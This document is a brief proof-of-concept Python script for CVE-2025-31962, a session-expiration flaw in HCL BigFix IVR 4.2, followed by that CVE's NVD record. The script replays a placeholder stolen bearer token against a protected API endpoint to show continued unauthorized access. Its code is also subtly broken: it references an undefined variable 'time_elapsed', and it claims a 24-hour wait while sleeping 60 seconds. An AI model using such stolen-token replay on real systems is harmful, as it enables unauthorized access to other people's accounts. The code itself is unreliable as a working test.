CVE-2025-31962

# CVE-2025-31962 PoC - Insufficient Session Expiration # This PoC demonstrates how to exploit the prolonged session issue import requests import time TARGET_URL = "https://<target>/api/v2" SESSION_TOKEN = "<stolen_session_token>" def check_session_validity(): """Check if session is still valid after extended period""" headers = { "Authorization": f"Bearer {SESSION_TOKEN}", "Content-Type": "application/json" } # Test accessing protected endpoint response = requests.get(f"{TARGET_URL}/protected/resource", headers=headers) if response.status_code == 200: print(f"[+] Session still valid after {time_elapsed} seconds") return True else: print(f"[-] Session expired or invalid") return False def prolonged_access_test(): """Test for prolonged unauthorized access""" print("[*] Testing CVE-2025-31962: Insufficient Session Expiration") # Wait for extended period (simulating prolonged access) wait_seconds = 86400 # 24 hours print(f"[*] Waiting {wait_seconds} seconds to test session persistence...") time.sleep(min(wait_seconds, 60)) # Shortened for demo if check_session_validity(): print("[!] VULNERABLE: Session did not expire properly") print("[!] Attacker can maintain prolonged unauthorized access") if __name__ == "__main__": prolonged_access_test()

{"cve": {"id": "CVE-2025-31962", "sourceIdentifier": "[email protected]", "published": "2026-01-07T12:17:01.720", "lastModified": "2026-01-12T18:22:21.657", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Insufficient session expiration in the Web UI authentication component in HCL BigFix IVR version 4.2 allows an authenticated attacker to gain prolonged unauthorized access to protected API endpoints due to excessive expiration periods."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:U/C:L/I:N/A:N", "baseScore": 2.0, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.5, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-613"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:bigfix_insights_for_vulnerability_remediation:4.2:*:*:*:*:*:*:*", "matchCriteriaId": "0CDB58BE-0D8B-4F78-8D21-0B9B70D2B5A0"}]}]}], "references": [{"url": "https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0127753", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}